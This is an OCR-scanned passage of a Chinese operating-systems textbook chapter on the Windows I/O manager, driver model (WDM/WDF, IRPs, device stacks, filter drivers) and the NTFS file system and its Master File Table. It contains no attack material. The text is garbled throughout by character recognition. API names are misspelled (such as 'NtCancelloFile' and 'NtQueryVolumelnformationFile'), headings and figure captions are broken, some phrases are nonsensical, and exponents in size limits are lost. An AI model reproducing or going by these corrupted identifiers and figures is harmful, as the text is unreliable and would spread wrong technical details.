个 明确 的 文件 偏 移 量 的 参数 ， 并 且 允 许 指定 一 个 用 于 访问 文件 锁定 区 域 字 节 的 钥匙 。 正 如 上 面 提 到 的 ， 
大 部 分 的 参数 都 和 指定 哪 一 个 函数 来 报告 (很 可 能 是 异步 ) IO 操作 的 完成 有 关 。 

NtQuerydirectoryFile 是 一 个 在 执行 过 程 中 访问 或 修改 指定 类 型 对 象 信息 的 标准 模式 的 一 个 例子 ， 
在 这 种 模式 中 存在 多 种 不 同 的 查询 API。 在 本 例 中 ， 指 定 类 型 的 对 象 是 指 与 某 些 目录 相关 的 一 些 文件 对 
象 。 一 个 参数 用 于 指定 请 求 什么 类 型 的 信息 ， 比 如 目录 中 的 文件 名 列表 ,或 者 是 经 过 扩展 的 目录 列表 所 
需要 的 每 个 文件 的 详细 信息 。 由 于 它 实 际 上 是 一 个 IO 操作 ， 因 此 它 支持 所 有 的 报告 IO 操作 已 完成 的 标 
准 方法 。NtQueryVolumelnformationFile 很 像 是 目录 查询 操作 ， 但 是 与 目录 查询 操作 不 同 的 是 ， 它 有 一 
个 参数 是 打开 的 卷 的 文件 句柄 ， 不 管 这 个 卷 上 是 否 有 文件 系统 。 与 目录 不 同 的 是 ， 卷 上 有 一 些 参 数 可 以 
修改 ， 因 此 这 里 有 了 单独 用 于 卷 的 API NtSetVolumelnformationFile 。 

NtNotifyChangeDirectoryFile 是 一 个 有 趣 的 NT 范式 的 例子 。 线 程 可 以 通过 IO 操作 来 确定 对 象 是 否 
发 生 了 改变 〈 对 象 主要 是 文件 系统 的 目录 ， 就 像 在 此 例 中 ; 也 可 能 是 注册 表 键 ) 。 因 为 IO 操作 是 异步 的 ， 
所 以 线程 在 调用 IO 操作 后 会 立即 返回 并 继续 执行 ， 并 且 只 有 在 修改 对 象 之 后 线程 才 会 得 到 通知 。 未 处 
理 的 请 求 作为 一 个 外 部 的 IO 操作 ， 使 用 一 个 IO 请 求 包 (IRP) 被 加 入 到 文件 系统 的 队列 中 等 待 。 如 果 
想 从 系统 移 除 一 个 文件 系统 卷 ， 给 执行 过 未 处 理 I/O 操 作 的 线程 的 通知 就 会 出 问题 ， 因 为 那些 1/O 操 作 正 
在 等 待 。 因 此 ，Windows 提 供 了 取消 未 处 理 IO 操 作 的 功能 ， 其 中 包括 支持 文件 系统 强行 卸载 有 未 处 理 
IO 操作 的 卷 的 功能 。 

NtQuerylnformationFile 是 一 个 用 于 查询 目录 中 指定 文件 的 信息 的 系统 调用 。 还 有 一 个 与 它 相 对 应 
的 系统 调用 :NtSetlnformationFile。 这 些 接 口 用 于 访问 和 修改 文件 的 各 种 相关 信息 ， 如 文件 名 ， 类 似 
于 加 密 、 压 缩 、 稀 疏 等 文件 特征 ， 其 他 文件 属性 和 详细 资料 ， 包 括 查 询 内 部 文件 ID 或 给 文件 分 配 一 个 唯 
一 的 二 进 制 名 称 TRID). 

这 些 系 统 调 用 本 质 上 是 特定 于 文件 的 ioctl 的 一 种 形式 。 这 组 操作 可 以 用 来 重 命名 或 删除 一 个 文件 。 
但 是 请 注意 ， 它 们 处 理 的 并 不 是 文件 名 ， 所 以 要 重 命名 或 删除 一 个 文件 之 前 必须 先 打 开 这 个 文件 。 它 们 
也 可 以 被 用 来 重新 命名 NTFS 上 的 交换 数据 流 ( 见 11.8 节 )。 

存在 独立 的 API (NtLockFile 和 NtUnlockFile) 用 来 设置 和 删除 文件 中 字 节 域 的 锁 。 通 过 使 用 共享 
模式 ，NtCreateFile 允 许 访问 被 限制 的 整个 文件 。 另 一 种 选择 是 这 些 锁 API， 它 们 用 来 强制 访问 文件 中 
受 限制 的 字 节 域 。 读 操作 和 写 操作 必须 提供 一 个 与 提供 给 NtLockFile 的 密 钥 相 符合 的 密 钥 ， 以 便 操 作 被 
锁定 的 区 域 。 

UNIX 中 也 有 类 似 的 功能 ， 但 在 UNIX 中 应 用 程序 可 以 自由 决定 是 否认 同 这 个 区 域 锁 。 
NtFsControlFile 和 前 面 提 到 的 查询 和 设置 操作 很 相像 ， 但 它 是 一 个 旨 在 处 理 特定 文件 的 操作 ， 其 他 的 
API 并 不 适合 处 理 这 种 文件 。 例 如 ， 有 些 操 作 只 针对 特定 的 文件 系统 。 

最 后 ， 还 有 一 些 其 他 的 系统 调用 ， 比 如 NtFlushBuffersFile。 像 UNIX 的 sync 系 统 调 用 一 样 ， 它 强 
制 把 文件 系统 数据 写 回 到 磁盘 。NtCancelloFile 用 于 取消 对 一 个 特定 文件 的 外 部 IO 请 求 ，NtDevicelo- 
ControlFile 实 现 了 对 设备 的 ioctl 操 作 。 它 的 操作 清单 实际 上 比 ioctl 更 长 。 有 一 些 系统 调用 用 于 按 文件 名 
删除 文件 ， 并 查询 特定 文件 的 属性 一 一 但 这 些 操作 只 是 由 上 面 列 出 的 其 他 I/O 管 理 器 操作 包装 而 成 的 。 
在 这 里 ， 我 们 虽然 列 出 ， 但 并 不 是 真 的 要 把 它们 实现 成 独立 的 系统 调用 。 还 有 一 些 用 于 处 理 1/O0 完 成 端 
口 的 系统 调用 ，Windows 的 队列 功能 帮助 多 线程 服务 器 提高 使 用 异步 /0 操作 的 效率 ， 主 要 通过 按 需 准备 
线程 并 降低 在 专用 线程 上 服务 IO 所 需要 的 上 下 文 切 换 数 目 来 实现 。 

11.7.3 VORI 

Windows IO 系统 由 即 插 即 用 服务 、 电 源 管理 器 、IO 管 理 器 和 设备 驱动 模型 组 成 。 即 插 即 用 服务 检 
测 硬 件 配置 上 的 改变 并 且 为 每 个 设备 创建 或 拆 印 设备 栈 ， 也 会 引起 设备 驱动 程序 的 装载 和 外 载 。 功 耗 管 
理 器 会 调节 IO 设备 的 功 耗 状 态 ， 以 在 设备 不 用 的 时 候 降 低 系 统 功 耗 。LO 管 理 器 为 管理 MIO 内 核对 象 以 及 
如 loCallDrivers 和 loCompleteRequest 等 基于 IRP 的 操作 提供 支持 。 但 是 ， 支 持 Windows LO 所 需要 的 大 
部 分 工作 都 由 设备 驱动 程序 本 身 实 现 。 
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1. 设备 驱动 程序 

为 了 确保 设备 驱动 程序 能 和 Windows 的 其 余部 分 协同 工作 ， 微 软 公司 定义 了 设备 驱动 程序 需要 符合 
的 Windows 驱 动 程序 模型 (WDM)。Windows 开 发 工具 箱 (Windows Driver Kit, WDK) 包含 文档 说 明 
以 及 样本 示例 用 来 帮助 驱动 程序 开发 人 员 开 发 满足 WDM 的 驱动 )。 大 部 分 Windows 驱 动 程序 的 开发 过 程 
都 是 先 从 WDK 复 制 一 份 合 适 的 简单 的 驱动 程序 ， 然 后 修改 它 。 

微软 公司 也 提供 一 个 驱动 程序 验证 器 ， 用 以 验证 驱动 程序 的 多 个 行为 以 确保 驱动 程序 符合 Windows 
驱动 程序 模型 的 结构 要 求 和 I/O 请 求 的 协议 要 求 、 内 存 管理 等 。 操 作 系 统 中 带 有 此 验证 器 ， 管 理 员 可 能 
通过 运行 verifier.exe 来 控制 驱动 程序 验证 器 ， 验 证 器 允许 管理 员 配 置 要 验证 哪些 驱动 程序 以 及 在 怎样 的 
范围 (多 少 资源 ) 内 验证 这 些 驱 动 程序 。 

即使 有 所 有 的 驱动 程序 开发 和 验证 支持 ， 在 Windows 中 写 一 个 简单 的 驱动 程序 仍然 是 非常 困难 的 事 
情 ， 因 此 微软 建立 了 一 个 叫 作 WDF (Windows 驱 动 程序 基础 ) 的 包装 系统 ， 它 运行 在 WDM 顶 层 ， 简 化 
了 很 多 更 普通 的 需求 ， 主 要 和 驱动 程序 与 电源 管理 和 即 插 即 用 操作 之 间 的 正确 交互 有 关 。 

为 了 进一步 简化 编写 驱动 程序 ， 也 为 了 提高 系统 的 健壮 性 ，WDF 包 含 UMDF (用 户 态 驱动 程序 架 
构 )， 使 用 UMDF 编 写 的 驱动 程序 作为 在 进程 中 执行 的 服务 。 还 有 KMDF (内 核 态 驱动 程序 架构 )， 使 用 
KMDE 编 写 的 驱动 程序 作为 在 内 核 中 执行 的 服务 ， 但 是 也 使 得 WDM 中 的 很 多 细节 变 得 不 可 预料 。 由 于 
底层 是 WDM， 并 且 WDM 提 供 了 驱动 程序 模型 ， 因 此 ， 本 节 将 主要 关注 WDM。 

在 Windows 中 ， 设 备 是 由 设备 对 象 描述 的 。 设 备 对 象 也 用 于 描述 硬件 (例如 总 线 ) ， 软 件 抽象 ( 例 
如 文件 系统 、 网 络 协议 ) ， 还 可 以 描述 内 核 扩展 〈 例 如 病毒 过 滤器 驱动 程序 ) 。 上 面 提 到 的 这 些 设备 对 象 
都 是 由 Windows 中 的 设备 栈 来 组 织 的 ， 见 前 面 的 图 11-16。 

IO 操作 从 IO 管理 器 调用 可 执行 API loCallDriver 程 序 开 始 ，loCallDriver 带 有 指向 顶层 设备 对 象 和 
描述 W/O 请 求 的 IRP 的 指针 。 这 个 例 程 可 以 找到 与 设备 对 象 联合 在 一 起 的 驱动 程序 。 在 IRP 中 指定 操作 类 
型 通常 都 符合 前 面 讲 过 的 IO 管理 器 系统 调用 ， 例 如 创建 、 读 取 和 关闭 。 

图 11-36 表 示 的 是 一 个 设备 栈 在 单独 一 层 上 的 关系 。 驱 动 程序 必须 为 每 个 操作 指定 一 个 进入 点 。 
loCallDriver 从 IRP 中 获取 操作 类 型 , 利用 在 当前 级 别 的 设备 栈 中 的 设备 对 象 来 查找 指定 的 驱动 程序 对 象 ， 
并 且 根 据 操作 类 型 索引 到 驱动 程序 分 派 表 去 查找 相应 驱动 程序 的 进入 点 。 最 后 会 把 设备 对 象 和 IRP 传 递 
给 驱动 程序 并 调用 它 。 


设备 对 象 加 载 的 设备 驱动 程序 
az 
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驱动 程序 代码 





图 11-36 设备 栈 中 的 单独 一 层 


一 旦 驱动 程序 完成 处 理 IRP 描 述 的 请 求 后 ， 它 将 有 三 种 选择 。 第 一 ， 驱 动 程序 可 以 再 一 次 调用 
loCallDriver， 把 IRP 和 设备 栈 中 的 下 一 个 设备 对 象 传递 给 相应 的 驱动 程序 。 第 二 ， 驱 动 程序 也 可 以 声明 
IO 请 求 已 经 完成 并 返回 到 调用 者 。 第 三 ， 驱 动 程序 还 可 以 在 内 部 使 IRP 排 队 并 返回 到 调用 者 ， 同 时 声明 
IO 请 求 仍 未 处 理 。 后 一 种 情况 下 ， 如 果 栈 上 的 所 有 驱动 都 认可 挂 起 行为 且 返 回 各 自 的 调用 者 ， 则 会 引 
起 一 次 异步 IO 操作 。 
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2. I/O 请 求 包 

图 11-37 表 示 的 是 IRP 中 的 主要 的 域 。IRP 的 底部 是 一 个 动态 大 小 的 数组 ， 包 含 那些 被 设备 栈 管理 请 
求 的 域 ， 每 个 驱动 程序 都 可 以 使 用 这 些 域 。 在 完成 一 次 WO 请 求 的 时 候 ， 这 些 设备 栈 的 域 也 允许 驱动 程 
序 指定 要 调用 哪个 例 程 。 在 完成 请 求 的 过 程 中 ， 按 倒序 访问 设备 栈 的 每 一 级 ， 并 且 依 次 调用 由 每 个 应 用 
程序 指定 的 完成 例 程 。 在 每 一 级 ， 驱 动 程序 可 以 继续 执行 以 完成 请 求 ， 也 可 以 因为 还 有 更 多 的 工作 要 做 
从 而 决定 让 请 求 处 于 未 处 理 状态 并 且 暂 停 1O 的 完成 。 
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图 11-37 IO 请 求 包 的 主要 域 


当 I/O 管 理 器 分 配 一 个 IRP 时 ， 为 了 分 派 一 个 足够 大 的 IRP， 它 必须 知道 这 个 设备 栈 的 深度 。 在 建立 
设备 栈 的 时 候 ，LIO 管 理 器 会 在 每 一 个 设备 对 象 的 域 中 记录 栈 的 深度 。 注 意 ， 在 任何 栈 中 都 没有 正式 地 
定义 下 一 个 设备 对 象 是 什么 。 这 个 信息 被 保存 在 栈 中 当前 驱动 程序 的 私有 数据 结构 中 。 事 实 上 这 个 栈 实 
际 上 并 不 一 定 是 一 个 真正 的 栈 。 在 每 一 层 栈 中 ， 驱 动 程序 都 可 以 自由 地 分 配 新 的 IRP， 或 者 继续 使 用 原 
来 的 IRP， 或 者 发 送 一 个 IO 操作 给 另 一 个 设备 栈 ， 或 者 甚至 转换 到 一 个 系统 工作 线程 中 继续 执行 。 

IRP 包 含 标 志 位 、 索 引 到 驱动 程序 分 派 表 的 操作 码 、 指 向 内 核 与 用 户 缓冲 区 的 指针 和 一 个 MDL (内 
存 描述 符 列表 ) 列表 。MDL 用 于 描述 由 缓冲 区 描述 的 物理 内 存 框 ， 也 就 是 用 于 DMA 操 作 。 有 一 些 域 用 
于 取消 和 完成 操作 。 当 LO 操作 已 经 完成 后 ， 在 处 理 IRP 时 用 于 排列 这 个 IRP 到 设备 中 的 域 会 被 重用 。 目 
的 是 给 用 于 在 原始 线程 的 上 下 文中 调用 IO 管理 器 的 完成 例 程 的 APC 控 制 对 象 提 供 内 存 。 还 有 一 个 连接 
域 用 于 连接 所 有 的 外 部 IRP 到 初始 化 它们 的 线程 。 

3. 设备 栈 

Windows 中 的 驱动 程序 可 以 自己 完成 所 有 的 任务 ， 如 图 11-38 所 示 的 打印 机 驱动 程序 。 另 一 方面 ， 
驱动 程序 也 可 以 堆 倒 起来， 即 一 个 请 求 可 以 在 一 组 驱动 程序 之 间 传 递 ， 每 个 驱动 程序 完成 一 部 分 工作 。 
图 11-38 也 给 出 了 两 个 堆 又 的 驱动 程序 。 

堆 公 驱动 程序 的 一 个 常见 用 途 是 将 总 线 管理 与 控制 设备 的 功能 性 工作 分 离 。 因 为 要 考虑 多 种 模式 和 总 线 
事务 ，PCI 总 线 上 的 管理 相当 复杂 。 通 过 将 这 部 分 工作 与 特定 于 设备 的 部 分 分 离 ， 驱 动 程序 开发 人 员 就 可 以 从 
学 习 如 何 控制 总 线 中 解脱 出 来 了 。 他 们 只 要 在 驱动 栈 中 使 用 标准 总 线 驱 动 程序 就 可 以 了 。 类 似 地 ，USB 和 SCSI 
驱动 程序 都 有 一 个 特定 于 设备 的 部 分 和 一 个 通用 部 分 。Windows 为 其 中 的 通用 部 分 提供 了 公共 的 驱动 程序 。 

堆 释 设备 驱动 程序 的 另 一 个 用 途 是 将 过 滤器 驱动 程序 (filter driver) 插入 驱动 栈 中 。 我 们 已 经 讨论 
过 文件 系统 过 滤器 驱动 程序 的 使 用 了 ， 该 驱动 程序 插入 文件 系统 之 上 。 过 滤器 驱动 程序 也 用 于 管理 物理 
硬件 。 在 IRP 沿 着 设备 栈 (device stack) 向 下 传递 的 过 程 中 ， 以 及 在 完成 操作 (completion operation ) 
中 IRP 沿 着 设备 栈 中 各 个 设备 驱动 程序 指定 的 完成 例 程 (completion routine) 向 上 传递 的 过 程 中 ,过滤 
器 驱动 程序 会 对 所 要 进行 的 操作 进行 变换 。 例 如 ， 一 个 过 滤器 驱动 程序 能 够 在 将 数据 存放 到 磁盘 上 之 前 
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对 数据 进行 压缩 ， 或 者 在 网 络 传输 前 对 数据 进行 加 密 。 将 过 滤器 放 在 这 里 意味 着 应 用 程序 和 真正 的 设备 
驱动 程序 都 不 必 知 道 过 滤器 的 存在 ， 而 过 滤器 会 自动 对 进出 设备 的 数据 进行 处 理 。 


用 户 进 程 





图 11-38 Windows 人 允许 驱 动 程序 堆 合 起 来 操作 设备 ， 这 种 堆 合 是 通过 设备 对 象 (Device Object) 来 表示 的 


内 核 态 设备 驱动 程序 是 影响 Windows 的 可 靠 性 和 稳定 性 的 严重 问题 。Windows 中 大 多 数 内 核 月 涡 都 
是 由 设备 驱动 程序 出 错 造成 的 。 因 为 内 核 态 设备 驱动 程序 与 内 核 及 执行 体 层 使 用 相同 的 地 址 空间 ， 驱 动 
程序 中 的 错误 可 能 破坏 内 核 数据 结构 ， 甚 至 更 糟 。 其 中 一 些 错 误 的 产生 ， 部 分 原因 是 为 Windows 编 写 的 
设备 驱动 程序 的 数量 极其 庞大 ， 部 分 原因 是 设备 驱动 程序 由 缺乏 经 验 的 开发 者 编写 。 当 然 ， 为 了 编写 一 
个 正确 的 驱动 程序 而 涉及 的 大 量 设备 细节 也 是 造成 驱动 程序 错误 的 原因 。 

I/O 模 型 是 强大 而 且 灵 活 的 ， 但 是 几乎 所 有 的 IO 都 是 异步 的 ， 因 此 系统 中 会 大 量 存 在 竞 态 条 件 
(race condition ) 。 从 Win9x 系 统 到 基于 NT 技术 的 Windows 系 统 ，Windows 2000 首 次 增加 了 即 插 即 用 (的 
功能 ) 和 电源 管理 设施 。 这 对 要 正确 地 操纵 在 处 理 IO 包 过 程 中 涉及 的 驱动 器 的 驱动 程序 提出 了 很 多 要 
求 。 PC 用户 常常 插 上 / 拔 掉 设 备 ， 把 笔记 本 电脑 合 上 盖子 装 入 公文 包 ， 而 通常 不 考虑 设备 上 那个 小 绿灯 
是 否 仍 然 亮 着 (表示 设备 正在 与 系统 交互 )。 编 写 在 这 样 的 环境 下 能 够 正确 运行 的 设备 驱动 程序 是 非常 
具有 挑战 性 的 ， 这 也 是 开发 WDF (Windows Driver Foundation) 以 简化 Windows 驱 动 模型 的 原因 。 

有 很 多 关于 WDM (Windows Driver Model) 和 更 新 的 WDF (Windows Driver Foundation) 的 有 用 书 
籍 (Kanetkar, 2008; Orwick 和 Smith,. 2007; Reeves, 2010; Viscarola“, 2007; Vostokov, 2009), 


11.8 Windows NT 文件 系统 


Windows 支持 若干 种 文件 系统 ， 其 中 最 重要 的 是 FAT-16、FAT-32 和 NTFS (NT 文件 系统 )。FAT-16 
是 MS-DOS 文 件 系统 ， 它 使 用 16 位 磁盘 地 址 ， 这 就 限制 了 它 使 用 的 磁盘 分 区 不 能 大 于 2GB。 现 在 ， 这 种 
文件 系统 基本 上 仅 用 来 访问 软盘 。FAT-32 使 用 32 位 磁盘 地 址 ， 最 大 支持 2TB 的 磁盘 分 区 。FAT32 没 有 任 
何 安 全 措施 ， 现 在 我 们 只 在 可 移动 介质 (如 内存 ) 中 使 用 它 。NTFS 是 一 个 专门 为 Windows NT 开发 的 文 
件 系统 。 从 Windows XP 开始 ， 计 算 机 厂商 把 它 作 为 默认 安装 的 文件 系统 ， 这 极 大 地 提升 了 Windows 的 
安全 性 和 功能 。NTFS 使 用 64 位 磁盘 地 址 并 且 (理论 上 ) 能 够 支持 最 大 2" 字 节 的 磁盘 分 区 ， 尽 管 还 有 其 
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他 因素 会 限制 磁盘 分 区 大 小 。 

因为 NTFS 文 件 系统 是 一 个 带 有 很 多 有 趣 的 特性 和 创新 设计 的 现代 文件 系统 ， 在 本 章 中 我 们 将 针对 
NTFS 文 件 系统 进行 讨论 。NTFS 是 一 个 大 而 且 复杂 的 文件 系统 ， 由 于 篇 幅 所 限 ， 我 们 不 能 讨论 其 所 有 的 
特性 ， 但 是 接 下 来 的 内 容 会 使 读者 对 它 印 象 深 刻 。 


11.8.1 基本 概念 

NTFS 限 制 每 个 独立 的 文件 名 最 多 由 255 个 字符 组 成 ， 全 路 径 名 最 多 有 32 767 个 字符 。 文 件 名 采用 
Unicode 编 码 ， 人 允许 非 拉 丁 语系 国家 的 用 户 (如 希腊 、 日 本 、 印 度 、 俄 罗斯 和 以 色 列 ) 用 他 们 的 母语 为 
文件 命名 。 例 如 ，pThAe 就 是 一 个 完全 合法 的 文件 名 。NTFS 完 全 支持 区 分 大 小 写 的 文件 名 (所 以 foo 与 
Foo 和 FOO 是 不 同 的 )。Win32 API 不 完全 支持 区 分 大 小 写 的 文件 名 ， 并 且 根 本 不 支持 区 分 大 小 写 的 目录 
名 。 为 了 保持 与 UNIX 系 统 的 兼容 ， 当 运行 POSIX 子 系统 时 ，Windows 提 供 区 分 大 小 写 的 支持 。Win32 不 
区 分 大 小 写 ， 但 是 它 保 持 大 小 写 状 态 ， 所 以 文件 名 可 以 包含 大 写字 母 和 小 写字 母 。 尽 管区 分 大 小 写 是 一 
个 UNIX 用 户 非 常熟 悉 的 特性 ， 但 是 对 一 般 用 户 而 言 ， 这 是 很 不 方便 的 。 例 如 ， 现 在 的 互联 网 在 很 大 程 
度 上 是 不 区 分 大 小 写 的 。 

与 FAT32 和 UNIX 文 件 不 同 ，NTFS 文 件 并 不 只 是 字 节 的 一 个 线性 序列 ， 而 是 一 个 文件 由 很 多 属性 组 
成 ,每 个 属性 由 一 个 字 节 流 表示 。 大 部 分 文件 都 包含 一 些 短 字 节 流 (如 文件 名 和 64 位 的 对 象 ID)， 和 一 
个 包含 数据 的 未 命名 的 长 字 节 流 。 当 然 ， 一 个 文件 也 可 以 有 两 个 或 多 个 数据 流 〈( 即 长 字 节 流 )。 每 个 流 
有 一 个 由 文件 名 、 一 个 冒号 和 一 个 流 名 组 成 的 名 字 ， 例 如 ，foo:stream1。 每 个 流 有 自己 的 大 小 ， 并 且 相 
对 于 所 有 其 他 的 流 都 是 可 以 独立 锁定 的 。 一 个 文件 中 存在 多 个 流 的 想法 在 NTFS 中 并 不 新 鲜 。 苹 果 
Macintosh 的 文件 系统 为 每 个 文件 使 用 两 个 流 ， 一 个 数据 分 支 (data fork) 和 一 个 资源 分 支 (resource 
fork)。NTFS 中 多 数据 流 的 首次 使 用 是 为 了 允许 一 个 NT 文件 服务 器 为 Macintosh 用 户 提 供 服 务 。 多 数据 
流 也 用 于 表示 文件 的 元 数据 ， 例 如 Windows GUI 中 使 用 的 JPEG 图 像 的 缩 略图 。 但 是 ， 多 数据 流 很 脆弱 ， 
并 且 在 传输 文件 到 其 他 文件 系统 , 通过 网 络 传输 文件 甚至 在 文件 备份 和 后 来 恢复 的 过 程 中 都 会 丢失 文件 。 
这 是 因为 很 多 工具 都 忽略 了 它们 。 

与 UNIX 文 件 系 统 类 似 ，NTFS 是 一 个 层次 化 的 文件 系统 。 名 字 的 各 部 分 之 间 用 “\” 分 隔 ， 而 不 是 
“/”， 这 是 从 MS-DOS 时 代 与 CP/M 相 兼容 的 需求 中 继承 下 来 的 (CP/M 使 用 斜 线 作 为 标志 ) 。 与 UNIX 中 当 
前 工作 目录 的 概念 不 同 的 是 ， 作 为 文件 系统 设计 的 一 个 基础 部 分 的 链接 到 当前 目录 (.) 和 父 目录 (..) 
的 硬 连接 ， 在 Windows 是 作为 一 种 惯例 来 是 实现 的 。 系 统 仅 在 其 中 的 POSIX 子 系统 里 支持 硬 连 接 ， 
NTFS 对 目录 的 遍历 检查 (UNIX 中 的 “x” 权 限 ) 的 支持 也 是 如 此 。 

NTFS 是 支持 符号 链接 的 。 为 了 避免 如 Spoofing 这 样 的 安全 问题 (当年 在 UNIX 4.2BSD 第 一 次 引入 
符号 链接 时 就 遇 到 过 )， 通常 只 允许 系统 管理 员 来 创建 符号 链接 。 在 Windows 中 符号 链接 的 实现 用 到 一 
个 叫 重 解 析 点 (reparse points) 的 NTFS 特 性 (将 在 本 节 后 续 部 分 讨论 ) 。 另 外 ，NTFS 也 支持 压缩 、 加 密 、 
容错 、 日 志和 稀疏 文件 。 我 们 马上 就 会 探讨 这 些 特 性 及 其 实现 。 


11.8.2 NTFS 文 件 系 统 的 实现 

NTFS 文 件 系 统 是 专门 为 NT 系统 开发 的 ， 用 来 替代 OS/2 中 的 HPFS 文 件 系 统 。 它 是 一 个 具有 很 高 复 
杂 性 和 精密 性 的 文件 系统 。NT 系 统 的 大 部 分 是 在 陆地 上 设计 的 。 从 这 方面 看 ，NTFS 与 NT 系统 其 他 部 分 
相 比 是 独一无二 的 ， 因 为 它 的 很 多 最 初 设计 都 是 在 一 稻 驶 出 普 吉 特 湾 的 帆船 的 甲板 上 完成 的 (严格 遵守 
上 午 工作 ， 下 午 喝 啤酒 的 作息 协议 )。 

接 下 来 ， 我 们 将 从 NTFS 结 构 开始 ， 探 讨 一 系列 NTFS 特 性 ， 包 括 文件 名 查找 、 文 件 压 缩 、 日 志和 加 密 。 

1. 文件 系统 结构 

每 个 NTFS 卷 (如 磁盘 分 区 ) 都 包含 文件 、 目 录 、 位 图 和 其 他 数据 结构 。 每 个 卷 被 组 织 成 磁盘 块 的 
一 个 线形 序列 〈 在 微软 的 术语 中 叫 “ 答 ”) ， 每 个 卷 中 块 的 大 小 是 固定 的 。 根 据 卷 的 大 小 不 同 ， 块 的 大 小 
从 512 字 节 到 64KB 不 等 。 大 多 数 NTFS 磁 盘 使 用 4KB 的 块 ， 作 为 有 利于 高 效 传输 的 大 块 和 有 利于 减少 内 
部 碎片 的 小 块 之 间 的 折 中 办 法 。 每 个 块 用 其 相对 于 卷 起 始 位 置 的 64 位 偏 移 量 来 指示 。 

每 个 卷 中 的 主要 数据 结构 叫 MET ( 主 文件 表 ，Master File Table)， 该 表 是 以 1KB 为 固定 大 小 的 记录 
的 线性 序列 。 每 个 MFT 记 录 描 述 一 个 文件 或 目录 。 它 包含 了 如 文件 名 、 时 间 惟 、 文 件 中 的 块 在 磁盘 上 的 
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地 址 的 列表 等 文件 属性 。 如 果 一 个 文件 非常 大 ， 有 时 候 会 需要 两 个 或 更 多 的 MFT 记 录 来 保存 所 有 块 的 地 
址 列表 。 这 时 ， 第 一 个 MFT 记 录 叫 作 基 本 记录 (base record)， 该 记录 指向 其 他 的 MFT 记 录 。 这 种 溢出 方 
案 可 以 追溯 到 CP/M， 那 时 每 个 目录 项 称 为 一 个 范围 (extent) 。 用 一 个 位 图 记录 哪个 MFT 表 项 是 空闲 的 。 

MEFT 本 身 就 是 一 个 文件 ， 可 以 被 放 在 卷 中 的 任何 位 置 ， 这 样 就 避免 了 在 第 一 磁道 上 出 现 错误 扇 区 引 
起 的 问题 。 而 且 MFT 可 以 根据 需要 变 大 ， 最 大 可 以 有 2“* 个 记录 。 

图 11-39 是 一 个 MFT。 每 个 MFT 记 录 由 数 
据 对 〈 属 性 头 ， 值 ) 的 一 个 序列 组 成 。 每 个 属 | 1KB 一 一 一 一 | 
性 由 一 个 说 明了 该 属性 是 什么 和 属性 值 有 多 长 
的 头 开始 。 一 些 属性 值 是 变 长 的 ， 如 文件 名 和 
数据 。 如 果 属 性 值 足够 短 能 够 放 到 MFT 记 录 中 ， 
那么 就 把 它 放 到 记录 里 。 这 叫 作 直 接 文件 
(immediate file, [Mullender and Tanenbaum, 
1984]) 。 如 果 属 性 值 太 长 ， 它 将 被 放 在 磁盘 的 
其 他 位 置 ， 并 在 MFT 记 录 里 存放 一 个 指向 它 的 
指针 。 这 使 得 NTFS 对 于 小 的 域 ( 即 那些 能 够 放 
入 MFT 记 录 中 的 域 ) 非常 有 效率 。 

最 开始 的 16 个 MFT 记 录 为 NTFS 元 数据 文 
件 而 预 留 ， 如 图 11-41 所 示 。 每 一 个 记录 描述 
了 一 个 正常 的 具有 属性 和 数据 块 的 文件 ， 就 如 
同 其 他 文件 一 样 。 这 些 文件 中 每 一 个 都 由 “$” 
开始 表明 它 是 一 个 元 数据 文件 。 第 一 个 记录 描 
述 了 MFT 文 件 本 身 。 它 说 明了 MFT 文 件 的 块 都 
放 在 哪里 以 确保 系统 能 找到 MFT 文 件 。 很 明显 ， 
Windows 需 要 一 个 方法 找到 MFT 文 件 中 第 一 个 KS: MERERI 
块 ， 以 便 找到 其 余 的 文件 系统 信息 。 找 到 MFT 文 件 中 第 一 个 块 的 方法 是 查看 启动 块 ， 那 是 卷 被 格式 化 为 
文件 系统 时 地 址 所 存放 的 位 置 。 

记录 1 是 MFT 文 件 早期 部 分 的 副本 。 这 部 分 信息 非常 重要 ， 因 此 拥有 第 二 份 副 本 至 关 重 要 ， 以 防 
MFT 的 第 一 块 坏 掉 。 记 录 2 是 一 个 Log 文 件 。 当 对 文件 系统 做 结构 性 的 改变 时 ， 例 如 ， 增 加 一 个 新 目录 或 
删除 一 个 现 有 目录 ， 动 作 在 执行 前 就 记录 在 Log 里 ， 从 而 增加 在 这 个 动作 执行 时 出 错 后 (比如 一 次 系统 
崩溃 ) 被 正确 恢复 的 机 会 。 对 文件 属性 做 的 改变 也 会 记录 在 这 里 。 事 实 上 ， 唯 一 不 会 记录 的 改变 是 对 用 
户 数据 的 改变 。 记 录 3 包 含 了 卷 的 信息 ， 比 如 大 小 、 卷 标 和 版 本 。 

上 面 提 到 ， 每 个 MFT 记 录 包 含 一 个 〈 属 性 头 ， 值 ) 数据 对 的 序列 。 属 性 在 $AttrDef 文 件 中 定义 。 这 
个 文件 的 信息 在 MFT 记 录 4 里 。 接 下 来 是 根 目 录 ， 根 目录 本 身 是 一 个 文件 并 且 可 以 变 为 任意 长 度 。MFT 
记录 5 用 来 描述 根 目 录 。 

卷 里 的 空余 空间 通过 一 个 位 图 来 跟踪 。 这 个 位 图 本 身 是 一 个 文件 ， 它 的 磁盘 地 址 和 属性 由 MFT 记 录 
6 给 出 。 下 一 个 MFT 记 录 指 向 引导 装载 程序 。 记 录 8 用 来 把 所 有 的 坏 块 链接 在 一 起 来 确保 不 会 有 文件 使 用 
它们 。 记 录 9 包 含 安全 信息 。 记 录 10 用 于 大 小 写 映 射 。 对 于 拉丁 字母 A-Z， 映 射 是 非常 明确 的 (至 少 是 对 
说 拉丁 语 的 人 来 说 )。 对 于 其 他 语言 的 映射 ， 如 希腊 、 亚 美 尼 亚 或 乔治 亚 ， 就 对 于 讲 拉 丁 语 的 人 不 太 明 
确 ， 因 此 这 个 文件 告诉 我 们 如 何 做 。 最 后 ， 记 录 11 是 一 个 目录 包含 杂项 文件 用 于 磁盘 配额 、 对 象 标识 符 、 
重 解析 点 等 。 最 后 四 个 MEFT 记 录 被 留 作 将 来 使 用 。 

每 个 MFT 记 录 由 一 个 记录 头 和 后 面 跟 着 的 (属性 头 , 值 ) 对 组 成 。 记 录 头 包含 一 个 幻 数 用 于 有 效 性 
检查 ， 一 个 序列 号 (每 次 当 记 录 被 一 个 新 文件 再 使 用 时 就 被 更 新 ) ， 文 件 引 用 记 数 ， 记 录 实 际 使 用 的 字 
节 数 ， 基 本 记录 ( 仅 用 于 扩展 记录 ) 的 标识 符 (索引 ， 序 列 号 )， 和 其 他 一 些 杂 项 。 

